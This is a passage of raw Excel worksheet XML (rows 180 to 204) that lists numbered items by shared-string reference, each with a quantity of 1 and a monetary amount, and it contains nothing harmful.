      <c r="AG179" s="47"/>
    </row>
    <row r="180" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A180" s="25"/>
      <c r="B180" s="36">
        <v>305</v>
      </c>
      <c r="C180" s="36"/>
      <c r="D180" s="63" t="s">
        <v>4527</v>
      </c>
      <c r="E180" s="63" t="s">
        <v>4219</v>
      </c>
      <c r="F180" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G180" s="26">
        <v>1</v>
      </c>
      <c r="H180" s="26"/>
      <c r="I180" s="26"/>
      <c r="J180" s="50">
        <v>1200</v>
      </c>
      <c r="L180" s="25"/>
      <c r="M180" s="25"/>
      <c r="N180" s="47"/>
      <c r="O180" s="47"/>
      <c r="P180" s="47"/>
      <c r="Q180" s="47"/>
      <c r="R180" s="47"/>
      <c r="S180" s="47"/>
      <c r="T180" s="47"/>
      <c r="U180" s="47"/>
      <c r="V180" s="47"/>
      <c r="W180" s="47"/>
      <c r="X180" s="47"/>
      <c r="Y180" s="47"/>
      <c r="Z180" s="47"/>
      <c r="AA180" s="47"/>
      <c r="AB180" s="47"/>
      <c r="AC180" s="47"/>
      <c r="AD180" s="47"/>
      <c r="AE180" s="47"/>
      <c r="AF180" s="47"/>
      <c r="AG180" s="47"/>
    </row>
    <row r="181" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A181" s="25"/>
      <c r="B181" s="36">
        <v>306</v>
      </c>
      <c r="C181" s="36"/>
      <c r="D181" s="63" t="s">
        <v>4528</v>
      </c>
      <c r="E181" s="63"/>
      <c r="F181" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G181" s="26">
        <v>1</v>
      </c>
      <c r="H181" s="26"/>
      <c r="I181" s="26"/>
      <c r="J181" s="50">
        <v>36000</v>
      </c>
      <c r="L181" s="25"/>
      <c r="M181" s="25"/>
      <c r="N181" s="47"/>
      <c r="O181" s="47"/>
      <c r="P181" s="47"/>
      <c r="Q181" s="47"/>
      <c r="R181" s="47"/>
      <c r="S181" s="47"/>
      <c r="T181" s="47"/>
      <c r="U181" s="47"/>
      <c r="V181" s="47"/>
      <c r="W181" s="47"/>
      <c r="X181" s="47"/>
      <c r="Y181" s="47"/>
      <c r="Z181" s="47"/>
      <c r="AA181" s="47"/>
      <c r="AB181" s="47"/>
      <c r="AC181" s="47"/>
      <c r="AD181" s="47"/>
      <c r="AE181" s="47"/>
      <c r="AF181" s="47"/>
      <c r="AG181" s="47"/>
    </row>
    <row r="182" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A182" s="25"/>
      <c r="B182" s="36">
        <v>307</v>
      </c>
      <c r="C182" s="36"/>
      <c r="D182" s="63" t="s">
        <v>4529</v>
      </c>
      <c r="E182" s="63"/>
      <c r="F182" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G182" s="26">
        <v>1</v>
      </c>
      <c r="H182" s="26"/>
      <c r="I182" s="26"/>
      <c r="J182" s="50">
        <v>4800</v>
      </c>
      <c r="K182" s="26"/>
      <c r="L182" s="25"/>
      <c r="M182" s="25"/>
      <c r="N182" s="47"/>
      <c r="O182" s="47"/>
      <c r="P182" s="47"/>
      <c r="Q182" s="47"/>
      <c r="R182" s="47"/>
      <c r="S182" s="47"/>
      <c r="T182" s="47"/>
      <c r="U182" s="47"/>
      <c r="V182" s="47"/>
      <c r="W182" s="47"/>
      <c r="X182" s="47"/>
      <c r="Y182" s="47"/>
      <c r="Z182" s="47"/>
      <c r="AA182" s="47"/>
      <c r="AB182" s="47"/>
      <c r="AC182" s="47"/>
      <c r="AD182" s="47"/>
      <c r="AE182" s="47"/>
      <c r="AF182" s="47"/>
      <c r="AG182" s="47"/>
    </row>
    <row r="183" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A183" s="25"/>
      <c r="B183" s="36">
        <v>308</v>
      </c>
      <c r="C183" s="36"/>
      <c r="D183" s="63" t="s">
        <v>1324</v>
      </c>
      <c r="E183" s="63" t="s">
        <v>4530</v>
      </c>
      <c r="F183" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G183" s="26">
        <v>1</v>
      </c>
      <c r="H183" s="26"/>
      <c r="I183" s="26"/>
      <c r="J183" s="50">
        <v>1200</v>
      </c>
      <c r="K183" s="26"/>
      <c r="L183" s="25"/>
      <c r="M183" s="25"/>
      <c r="N183" s="47"/>
      <c r="O183" s="47"/>
      <c r="P183" s="47"/>
      <c r="Q183" s="47"/>
      <c r="R183" s="47"/>
      <c r="S183" s="47"/>
      <c r="T183" s="47"/>
      <c r="U183" s="47"/>
      <c r="V183" s="47"/>
      <c r="W183" s="47"/>
      <c r="X183" s="47"/>
      <c r="Y183" s="47"/>
      <c r="Z183" s="47"/>
      <c r="AA183" s="47"/>
      <c r="AB183" s="47"/>
      <c r="AC183" s="47"/>
      <c r="AD183" s="47"/>
      <c r="AE183" s="47"/>
      <c r="AF183" s="47"/>
      <c r="AG183" s="47"/>
    </row>
    <row r="184" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A184" s="25"/>
      <c r="B184" s="36">
        <v>309</v>
      </c>
      <c r="C184" s="36"/>
      <c r="D184" s="63" t="s">
        <v>1273</v>
      </c>
      <c r="E184" s="63" t="s">
        <v>4531</v>
      </c>
      <c r="F184" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G184" s="26">
        <v>1</v>
      </c>
      <c r="H184" s="26"/>
      <c r="I184" s="26"/>
      <c r="J184" s="50">
        <v>3600</v>
      </c>
      <c r="K184" s="26"/>
      <c r="L184" s="25"/>
      <c r="M184" s="25"/>
      <c r="N184" s="47"/>
      <c r="O184" s="47"/>
      <c r="P184" s="47"/>
      <c r="Q184" s="47"/>
      <c r="R184" s="47"/>
      <c r="S184" s="47"/>
      <c r="T184" s="47"/>
      <c r="U184" s="47"/>
      <c r="V184" s="47"/>
      <c r="W184" s="47"/>
      <c r="X184" s="47"/>
      <c r="Y184" s="47"/>
      <c r="Z184" s="47"/>
      <c r="AA184" s="47"/>
      <c r="AB184" s="47"/>
      <c r="AC184" s="47"/>
      <c r="AD184" s="47"/>
      <c r="AE184" s="47"/>
      <c r="AF184" s="47"/>
      <c r="AG184" s="47"/>
    </row>
    <row r="185" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A185" s="25"/>
      <c r="B185" s="36">
        <v>310</v>
      </c>
      <c r="C185" s="36"/>
      <c r="D185" s="63" t="s">
        <v>4532</v>
      </c>
      <c r="E185" s="63"/>
      <c r="F185" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G185" s="26">
        <v>1</v>
      </c>
      <c r="H185" s="26"/>
      <c r="I185" s="75"/>
      <c r="J185" s="50">
        <v>480</v>
      </c>
      <c r="L185" s="25"/>
      <c r="M185" s="25"/>
      <c r="N185" s="47"/>
      <c r="O185" s="47"/>
      <c r="P185" s="47"/>
      <c r="Q185" s="47"/>
      <c r="R185" s="47"/>
      <c r="S185" s="47"/>
      <c r="T185" s="47"/>
      <c r="U185" s="47"/>
      <c r="V185" s="47"/>
      <c r="W185" s="47"/>
      <c r="X185" s="47"/>
      <c r="Y185" s="47"/>
      <c r="Z185" s="47"/>
      <c r="AA185" s="47"/>
      <c r="AB185" s="47"/>
      <c r="AC185" s="47"/>
      <c r="AD185" s="47"/>
      <c r="AE185" s="47"/>
      <c r="AF185" s="47"/>
      <c r="AG185" s="47"/>
    </row>
    <row r="186" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A186" s="25"/>
      <c r="B186" s="36">
        <v>311</v>
      </c>
      <c r="C186" s="36"/>
      <c r="D186" s="63" t="s">
        <v>4533</v>
      </c>
      <c r="E186" s="63" t="s">
        <v>4534</v>
      </c>
      <c r="F186" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G186" s="26">
        <v>1</v>
      </c>
      <c r="H186" s="26"/>
      <c r="I186" s="75"/>
      <c r="J186" s="50">
        <v>480</v>
      </c>
      <c r="L186" s="25"/>
      <c r="M186" s="25"/>
      <c r="N186" s="47"/>
      <c r="O186" s="47"/>
      <c r="P186" s="47"/>
      <c r="Q186" s="47"/>
      <c r="R186" s="47"/>
      <c r="S186" s="47"/>
      <c r="T186" s="47"/>
      <c r="U186" s="47"/>
      <c r="V186" s="47"/>
      <c r="W186" s="47"/>
      <c r="X186" s="47"/>
      <c r="Y186" s="47"/>
      <c r="Z186" s="47"/>
      <c r="AA186" s="47"/>
      <c r="AB186" s="47"/>
      <c r="AC186" s="47"/>
      <c r="AD186" s="47"/>
      <c r="AE186" s="47"/>
      <c r="AF186" s="47"/>
      <c r="AG186" s="47"/>
    </row>
    <row r="187" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A187" s="25"/>
      <c r="B187" s="36">
        <v>312</v>
      </c>
      <c r="C187" s="36"/>
      <c r="D187" s="63" t="s">
        <v>1110</v>
      </c>
      <c r="E187" s="63" t="s">
        <v>4535</v>
      </c>
      <c r="F187" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G187" s="26">
        <v>1</v>
      </c>
      <c r="H187" s="26"/>
      <c r="I187" s="75"/>
      <c r="J187" s="50">
        <v>720</v>
      </c>
      <c r="L187" s="25"/>
      <c r="M187" s="25"/>
      <c r="N187" s="47"/>
      <c r="O187" s="47"/>
      <c r="P187" s="47"/>
      <c r="Q187" s="47"/>
      <c r="R187" s="47"/>
      <c r="S187" s="47"/>
      <c r="T187" s="47"/>
      <c r="U187" s="47"/>
      <c r="V187" s="47"/>
      <c r="W187" s="47"/>
      <c r="X187" s="47"/>
      <c r="Y187" s="47"/>
      <c r="Z187" s="47"/>
      <c r="AA187" s="47"/>
      <c r="AB187" s="47"/>
      <c r="AC187" s="47"/>
      <c r="AD187" s="47"/>
      <c r="AE187" s="47"/>
      <c r="AF187" s="47"/>
      <c r="AG187" s="47"/>
    </row>
    <row r="188" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A188" s="25"/>
      <c r="B188" s="74" t="s">
        <v>4536</v>
      </c>
      <c r="C188" s="74"/>
      <c r="D188" s="74"/>
      <c r="E188" s="74"/>
      <c r="F188" s="36"/>
      <c r="G188" s="26"/>
      <c r="H188" s="26"/>
      <c r="I188" s="26"/>
      <c r="J188" s="50">
        <v>0</v>
      </c>
      <c r="L188" s="25"/>
      <c r="M188" s="25"/>
      <c r="N188" s="47"/>
      <c r="O188" s="47"/>
      <c r="P188" s="47"/>
      <c r="Q188" s="47"/>
      <c r="R188" s="47"/>
      <c r="S188" s="47"/>
      <c r="T188" s="47"/>
      <c r="U188" s="47"/>
      <c r="V188" s="47"/>
      <c r="W188" s="47"/>
      <c r="X188" s="47"/>
      <c r="Y188" s="47"/>
      <c r="Z188" s="47"/>
      <c r="AA188" s="47"/>
      <c r="AB188" s="47"/>
      <c r="AC188" s="47"/>
      <c r="AD188" s="47"/>
      <c r="AE188" s="47"/>
      <c r="AF188" s="47"/>
      <c r="AG188" s="47"/>
    </row>
    <row r="189" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A189" s="25"/>
      <c r="B189" s="36">
        <v>313</v>
      </c>
      <c r="C189" s="36"/>
      <c r="D189" s="63" t="s">
        <v>3683</v>
      </c>
      <c r="E189" s="63" t="s">
        <v>4491</v>
      </c>
      <c r="F189" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G189" s="26">
        <v>1</v>
      </c>
      <c r="H189" s="26"/>
      <c r="I189" s="26"/>
      <c r="J189" s="50">
        <v>800</v>
      </c>
      <c r="L189" s="25"/>
      <c r="M189" s="25"/>
      <c r="N189" s="47"/>
      <c r="O189" s="47"/>
      <c r="P189" s="47"/>
      <c r="Q189" s="47"/>
      <c r="R189" s="47"/>
      <c r="S189" s="47"/>
      <c r="T189" s="47"/>
      <c r="U189" s="47"/>
      <c r="V189" s="47"/>
      <c r="W189" s="47"/>
      <c r="X189" s="47"/>
      <c r="Y189" s="47"/>
      <c r="Z189" s="47"/>
      <c r="AA189" s="47"/>
      <c r="AB189" s="47"/>
      <c r="AC189" s="47"/>
      <c r="AD189" s="47"/>
      <c r="AE189" s="47"/>
      <c r="AF189" s="47"/>
      <c r="AG189" s="47"/>
    </row>
    <row r="190" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A190" s="25"/>
      <c r="B190" s="36">
        <v>314</v>
      </c>
      <c r="C190" s="36"/>
      <c r="D190" s="63" t="s">
        <v>4166</v>
      </c>
      <c r="E190" s="63" t="s">
        <v>4537</v>
      </c>
      <c r="F190" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G190" s="26">
        <v>1</v>
      </c>
      <c r="H190" s="26"/>
      <c r="I190" s="26"/>
      <c r="J190" s="50">
        <v>640</v>
      </c>
      <c r="L190" s="25"/>
      <c r="M190" s="25"/>
      <c r="N190" s="47"/>
      <c r="O190" s="47"/>
      <c r="P190" s="47"/>
      <c r="Q190" s="47"/>
      <c r="R190" s="47"/>
      <c r="S190" s="47"/>
      <c r="T190" s="47"/>
      <c r="U190" s="47"/>
      <c r="V190" s="47"/>
      <c r="W190" s="47"/>
      <c r="X190" s="47"/>
      <c r="Y190" s="47"/>
      <c r="Z190" s="47"/>
      <c r="AA190" s="47"/>
      <c r="AB190" s="47"/>
      <c r="AC190" s="47"/>
      <c r="AD190" s="47"/>
      <c r="AE190" s="47"/>
      <c r="AF190" s="47"/>
      <c r="AG190" s="47"/>
    </row>
    <row r="191" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A191" s="25"/>
      <c r="B191" s="36">
        <v>315</v>
      </c>
      <c r="C191" s="36"/>
      <c r="D191" s="63" t="s">
        <v>4474</v>
      </c>
      <c r="E191" s="63"/>
      <c r="F191" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G191" s="26">
        <v>1</v>
      </c>
      <c r="H191" s="26"/>
      <c r="I191" s="26"/>
      <c r="J191" s="50">
        <v>1600</v>
      </c>
      <c r="K191" s="26"/>
      <c r="L191" s="25"/>
      <c r="M191" s="25"/>
      <c r="N191" s="47"/>
      <c r="O191" s="47"/>
      <c r="P191" s="47"/>
      <c r="Q191" s="47"/>
      <c r="R191" s="47"/>
      <c r="S191" s="47"/>
      <c r="T191" s="47"/>
      <c r="U191" s="47"/>
      <c r="V191" s="47"/>
      <c r="W191" s="47"/>
      <c r="X191" s="47"/>
      <c r="Y191" s="47"/>
      <c r="Z191" s="47"/>
      <c r="AA191" s="47"/>
      <c r="AB191" s="47"/>
      <c r="AC191" s="47"/>
      <c r="AD191" s="47"/>
      <c r="AE191" s="47"/>
      <c r="AF191" s="47"/>
      <c r="AG191" s="47"/>
    </row>
    <row r="192" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A192" s="25"/>
      <c r="B192" s="36">
        <v>316</v>
      </c>
      <c r="C192" s="36"/>
      <c r="D192" s="63" t="s">
        <v>4538</v>
      </c>
      <c r="E192" s="63" t="s">
        <v>4381</v>
      </c>
      <c r="F192" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G192" s="26">
        <v>1</v>
      </c>
      <c r="H192" s="26"/>
      <c r="I192" s="26"/>
      <c r="J192" s="50">
        <v>480</v>
      </c>
      <c r="K192" s="26"/>
      <c r="L192" s="25"/>
      <c r="M192" s="25"/>
      <c r="N192" s="47"/>
      <c r="O192" s="47"/>
      <c r="P192" s="47"/>
      <c r="Q192" s="47"/>
      <c r="R192" s="47"/>
      <c r="S192" s="47"/>
      <c r="T192" s="47"/>
      <c r="U192" s="47"/>
      <c r="V192" s="47"/>
      <c r="W192" s="47"/>
      <c r="X192" s="47"/>
      <c r="Y192" s="47"/>
      <c r="Z192" s="47"/>
      <c r="AA192" s="47"/>
      <c r="AB192" s="47"/>
      <c r="AC192" s="47"/>
      <c r="AD192" s="47"/>
      <c r="AE192" s="47"/>
      <c r="AF192" s="47"/>
      <c r="AG192" s="47"/>
    </row>
    <row r="193" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A193" s="25"/>
      <c r="B193" s="36">
        <v>317</v>
      </c>
      <c r="C193" s="36"/>
      <c r="D193" s="66" t="s">
        <v>4539</v>
      </c>
      <c r="E193" s="66" t="s">
        <v>4491</v>
      </c>
      <c r="F193" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G193" s="26">
        <v>1</v>
      </c>
      <c r="H193" s="36"/>
      <c r="I193" s="76"/>
      <c r="J193" s="50">
        <v>480</v>
      </c>
      <c r="K193" s="26"/>
      <c r="L193" s="25"/>
      <c r="M193" s="25"/>
      <c r="N193" s="47"/>
      <c r="O193" s="47"/>
      <c r="P193" s="47"/>
      <c r="Q193" s="47"/>
      <c r="R193" s="47"/>
      <c r="S193" s="47"/>
      <c r="T193" s="47"/>
      <c r="U193" s="47"/>
      <c r="V193" s="47"/>
      <c r="W193" s="47"/>
      <c r="X193" s="47"/>
      <c r="Y193" s="47"/>
      <c r="Z193" s="47"/>
      <c r="AA193" s="47"/>
      <c r="AB193" s="47"/>
      <c r="AC193" s="47"/>
      <c r="AD193" s="47"/>
      <c r="AE193" s="47"/>
      <c r="AF193" s="47"/>
      <c r="AG193" s="47"/>
    </row>
    <row r="194" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A194" s="25"/>
      <c r="B194" s="36">
        <v>318</v>
      </c>
      <c r="C194" s="36"/>
      <c r="D194" s="63" t="s">
        <v>4540</v>
      </c>
      <c r="E194" s="63" t="s">
        <v>4541</v>
      </c>
      <c r="F194" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G194" s="26">
        <v>1</v>
      </c>
      <c r="H194" s="26"/>
      <c r="I194" s="75"/>
      <c r="J194" s="50">
        <v>800</v>
      </c>
      <c r="L194" s="25"/>
      <c r="M194" s="25"/>
      <c r="N194" s="47"/>
      <c r="O194" s="47"/>
      <c r="P194" s="47"/>
      <c r="Q194" s="47"/>
      <c r="R194" s="47"/>
      <c r="S194" s="47"/>
      <c r="T194" s="47"/>
      <c r="U194" s="47"/>
      <c r="V194" s="47"/>
      <c r="W194" s="47"/>
      <c r="X194" s="47"/>
      <c r="Y194" s="47"/>
      <c r="Z194" s="47"/>
      <c r="AA194" s="47"/>
      <c r="AB194" s="47"/>
      <c r="AC194" s="47"/>
      <c r="AD194" s="47"/>
      <c r="AE194" s="47"/>
      <c r="AF194" s="47"/>
      <c r="AG194" s="47"/>
    </row>
    <row r="195" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A195" s="25"/>
      <c r="B195" s="36">
        <v>320</v>
      </c>
      <c r="C195" s="36"/>
      <c r="D195" s="63" t="s">
        <v>3683</v>
      </c>
      <c r="E195" s="63" t="s">
        <v>4542</v>
      </c>
      <c r="F195" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G195" s="26">
        <v>1</v>
      </c>
      <c r="H195" s="26"/>
      <c r="I195" s="75"/>
      <c r="J195" s="50">
        <v>480</v>
      </c>
      <c r="L195" s="25"/>
      <c r="M195" s="25"/>
      <c r="N195" s="47"/>
      <c r="O195" s="47"/>
      <c r="P195" s="47"/>
      <c r="Q195" s="47"/>
      <c r="R195" s="47"/>
      <c r="S195" s="47"/>
      <c r="T195" s="47"/>
      <c r="U195" s="47"/>
      <c r="V195" s="47"/>
      <c r="W195" s="47"/>
      <c r="X195" s="47"/>
      <c r="Y195" s="47"/>
      <c r="Z195" s="47"/>
      <c r="AA195" s="47"/>
      <c r="AB195" s="47"/>
      <c r="AC195" s="47"/>
      <c r="AD195" s="47"/>
      <c r="AE195" s="47"/>
      <c r="AF195" s="47"/>
      <c r="AG195" s="47"/>
    </row>
    <row r="196" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A196" s="25"/>
      <c r="B196" s="36">
        <v>321</v>
      </c>
      <c r="C196" s="36"/>
      <c r="D196" s="63" t="s">
        <v>4543</v>
      </c>
      <c r="E196" s="63" t="s">
        <v>4544</v>
      </c>
      <c r="F196" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G196" s="26">
        <v>1</v>
      </c>
      <c r="H196" s="26"/>
      <c r="I196" s="26"/>
      <c r="J196" s="50">
        <v>320</v>
      </c>
      <c r="L196" s="25"/>
      <c r="M196" s="25"/>
      <c r="N196" s="47"/>
      <c r="O196" s="47"/>
      <c r="P196" s="47"/>
      <c r="Q196" s="47"/>
      <c r="R196" s="47"/>
      <c r="S196" s="47"/>
      <c r="T196" s="47"/>
      <c r="U196" s="47"/>
      <c r="V196" s="47"/>
      <c r="W196" s="47"/>
      <c r="X196" s="47"/>
      <c r="Y196" s="47"/>
      <c r="Z196" s="47"/>
      <c r="AA196" s="47"/>
      <c r="AB196" s="47"/>
      <c r="AC196" s="47"/>
      <c r="AD196" s="47"/>
      <c r="AE196" s="47"/>
      <c r="AF196" s="47"/>
      <c r="AG196" s="47"/>
    </row>
    <row r="197" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A197" s="25"/>
      <c r="B197" s="36">
        <v>322</v>
      </c>
      <c r="C197" s="36"/>
      <c r="D197" s="63" t="s">
        <v>3899</v>
      </c>
      <c r="E197" s="63" t="s">
        <v>4545</v>
      </c>
      <c r="F197" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G197" s="26">
        <v>1</v>
      </c>
      <c r="H197" s="26"/>
      <c r="I197" s="26"/>
      <c r="J197" s="50">
        <v>4800</v>
      </c>
      <c r="L197" s="25"/>
      <c r="M197" s="25"/>
      <c r="N197" s="47"/>
      <c r="O197" s="47"/>
      <c r="P197" s="47"/>
      <c r="Q197" s="47"/>
      <c r="R197" s="47"/>
      <c r="S197" s="47"/>
      <c r="T197" s="47"/>
      <c r="U197" s="47"/>
      <c r="V197" s="47"/>
      <c r="W197" s="47"/>
      <c r="X197" s="47"/>
      <c r="Y197" s="47"/>
      <c r="Z197" s="47"/>
      <c r="AA197" s="47"/>
      <c r="AB197" s="47"/>
      <c r="AC197" s="47"/>
      <c r="AD197" s="47"/>
      <c r="AE197" s="47"/>
      <c r="AF197" s="47"/>
      <c r="AG197" s="47"/>
    </row>
    <row r="198" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A198" s="25"/>
      <c r="B198" s="36">
        <v>323</v>
      </c>
      <c r="C198" s="36"/>
      <c r="D198" s="63" t="s">
        <v>4546</v>
      </c>
      <c r="E198" s="63" t="s">
        <v>4547</v>
      </c>
      <c r="F198" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G198" s="26">
        <v>1</v>
      </c>
      <c r="H198" s="26"/>
      <c r="I198" s="26"/>
      <c r="J198" s="50">
        <v>5600</v>
      </c>
      <c r="L198" s="25"/>
      <c r="M198" s="25"/>
      <c r="N198" s="47"/>
      <c r="O198" s="47"/>
      <c r="P198" s="47"/>
      <c r="Q198" s="47"/>
      <c r="R198" s="47"/>
      <c r="S198" s="47"/>
      <c r="T198" s="47"/>
      <c r="U198" s="47"/>
      <c r="V198" s="47"/>
      <c r="W198" s="47"/>
      <c r="X198" s="47"/>
      <c r="Y198" s="47"/>
      <c r="Z198" s="47"/>
      <c r="AA198" s="47"/>
      <c r="AB198" s="47"/>
      <c r="AC198" s="47"/>
      <c r="AD198" s="47"/>
      <c r="AE198" s="47"/>
      <c r="AF198" s="47"/>
      <c r="AG198" s="47"/>
    </row>
    <row r="199" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A199" s="25"/>
      <c r="B199" s="36">
        <v>325</v>
      </c>
      <c r="C199" s="36"/>
      <c r="D199" s="63" t="s">
        <v>4166</v>
      </c>
      <c r="E199" s="63" t="s">
        <v>2528</v>
      </c>
      <c r="F199" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G199" s="26">
        <v>1</v>
      </c>
      <c r="H199" s="26"/>
      <c r="I199" s="26"/>
      <c r="J199" s="50">
        <v>360</v>
      </c>
      <c r="L199" s="25"/>
      <c r="M199" s="25"/>
      <c r="N199" s="47"/>
      <c r="O199" s="47"/>
      <c r="P199" s="47"/>
      <c r="Q199" s="47"/>
      <c r="R199" s="47"/>
      <c r="S199" s="47"/>
      <c r="T199" s="47"/>
      <c r="U199" s="47"/>
      <c r="V199" s="47"/>
      <c r="W199" s="47"/>
      <c r="X199" s="47"/>
      <c r="Y199" s="47"/>
      <c r="Z199" s="47"/>
      <c r="AA199" s="47"/>
      <c r="AB199" s="47"/>
      <c r="AC199" s="47"/>
      <c r="AD199" s="47"/>
      <c r="AE199" s="47"/>
      <c r="AF199" s="47"/>
      <c r="AG199" s="47"/>
    </row>
    <row r="200" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A200" s="25"/>
      <c r="B200" s="74" t="s">
        <v>4548</v>
      </c>
      <c r="C200" s="74"/>
      <c r="D200" s="74"/>
      <c r="E200" s="74"/>
      <c r="F200" s="36"/>
      <c r="G200" s="26"/>
      <c r="H200" s="26"/>
      <c r="I200" s="26"/>
      <c r="J200" s="50">
        <v>0</v>
      </c>
      <c r="K200" s="26"/>
      <c r="L200" s="25"/>
      <c r="M200" s="25"/>
      <c r="N200" s="47"/>
      <c r="O200" s="47"/>
      <c r="P200" s="47"/>
      <c r="Q200" s="47"/>
      <c r="R200" s="47"/>
      <c r="S200" s="47"/>
      <c r="T200" s="47"/>
      <c r="U200" s="47"/>
      <c r="V200" s="47"/>
      <c r="W200" s="47"/>
      <c r="X200" s="47"/>
      <c r="Y200" s="47"/>
      <c r="Z200" s="47"/>
      <c r="AA200" s="47"/>
      <c r="AB200" s="47"/>
      <c r="AC200" s="47"/>
      <c r="AD200" s="47"/>
      <c r="AE200" s="47"/>
      <c r="AF200" s="47"/>
      <c r="AG200" s="47"/>
    </row>
    <row r="201" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A201" s="25"/>
      <c r="B201" s="36">
        <v>326</v>
      </c>
      <c r="C201" s="36"/>
      <c r="D201" s="63" t="s">
        <v>4549</v>
      </c>
      <c r="E201" s="63" t="s">
        <v>4498</v>
      </c>
      <c r="F201" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G201" s="26">
        <v>1</v>
      </c>
      <c r="H201" s="26"/>
      <c r="I201" s="26"/>
      <c r="J201" s="50">
        <v>12000</v>
      </c>
      <c r="K201" s="26"/>
      <c r="L201" s="25"/>
      <c r="M201" s="25"/>
      <c r="N201" s="47"/>
      <c r="O201" s="47"/>
      <c r="P201" s="47"/>
      <c r="Q201" s="47"/>
      <c r="R201" s="47"/>
      <c r="S201" s="47"/>
      <c r="T201" s="47"/>
      <c r="U201" s="47"/>
      <c r="V201" s="47"/>
      <c r="W201" s="47"/>
      <c r="X201" s="47"/>
      <c r="Y201" s="47"/>
      <c r="Z201" s="47"/>
      <c r="AA201" s="47"/>
      <c r="AB201" s="47"/>
      <c r="AC201" s="47"/>
      <c r="AD201" s="47"/>
      <c r="AE201" s="47"/>
      <c r="AF201" s="47"/>
      <c r="AG201" s="47"/>
    </row>
    <row r="202" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A202" s="25"/>
      <c r="B202" s="36">
        <v>328</v>
      </c>
      <c r="C202" s="36"/>
      <c r="D202" s="63" t="s">
        <v>4550</v>
      </c>
      <c r="E202" s="63"/>
      <c r="F202" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G202" s="26">
        <v>1</v>
      </c>
      <c r="H202" s="26"/>
      <c r="I202" s="26"/>
      <c r="J202" s="50">
        <v>50000</v>
      </c>
      <c r="K202" s="26"/>
      <c r="L202" s="25"/>
      <c r="M202" s="25"/>
      <c r="N202" s="47"/>
      <c r="O202" s="47"/>
      <c r="P202" s="47"/>
      <c r="Q202" s="47"/>
      <c r="R202" s="47"/>
      <c r="S202" s="47"/>
      <c r="T202" s="47"/>
      <c r="U202" s="47"/>
      <c r="V202" s="47"/>
      <c r="W202" s="47"/>
      <c r="X202" s="47"/>
      <c r="Y202" s="47"/>
      <c r="Z202" s="47"/>
      <c r="AA202" s="47"/>
      <c r="AB202" s="47"/>
      <c r="AC202" s="47"/>
      <c r="AD202" s="47"/>
      <c r="AE202" s="47"/>
      <c r="AF202" s="47"/>
      <c r="AG202" s="47"/>
    </row>
    <row r="203" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A203" s="25"/>
      <c r="B203" s="36">
        <v>329</v>
      </c>
      <c r="C203" s="36"/>
      <c r="D203" s="66" t="s">
        <v>4551</v>
      </c>
      <c r="E203" s="66"/>
      <c r="F203" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G203" s="26">
        <v>1</v>
      </c>
      <c r="H203" s="36"/>
      <c r="I203" s="76"/>
      <c r="J203" s="50">
        <v>12000</v>
      </c>
      <c r="K203" s="26" t="s">
        <v>4552</v>
      </c>
      <c r="L203" s="25"/>
      <c r="M203" s="25"/>
      <c r="N203" s="47"/>
      <c r="O203" s="47"/>
      <c r="P203" s="47"/>
      <c r="Q203" s="47"/>
      <c r="R203" s="47"/>
      <c r="S203" s="47"/>
      <c r="T203" s="47"/>
      <c r="U203" s="47"/>
      <c r="V203" s="47"/>
      <c r="W203" s="47"/>
      <c r="X203" s="47"/>
      <c r="Y203" s="47"/>
      <c r="Z203" s="47"/>
      <c r="AA203" s="47"/>
      <c r="AB203" s="47"/>
      <c r="AC203" s="47"/>
      <c r="AD203" s="47"/>
      <c r="AE203" s="47"/>
      <c r="AF203" s="47"/>
      <c r="AG203" s="47"/>
    </row>
    <row r="204" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A204" s="25"/>
      <c r="B204" s="36">
        <v>330</v>
      </c>
      <c r="C204" s="36"/>
      <c r="D204" s="63" t="s">
        <v>4166</v>
      </c>
      <c r="E204" s="63" t="s">
        <v>2528</v>
      </c>
      <c r="F204" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G204" s="26">
        <v>1</v>
      </c>
      <c r="H204" s="26"/>
      <c r="I204" s="75"/>
      <c r="J204" s="50">
        <v>900</v>
      </c>
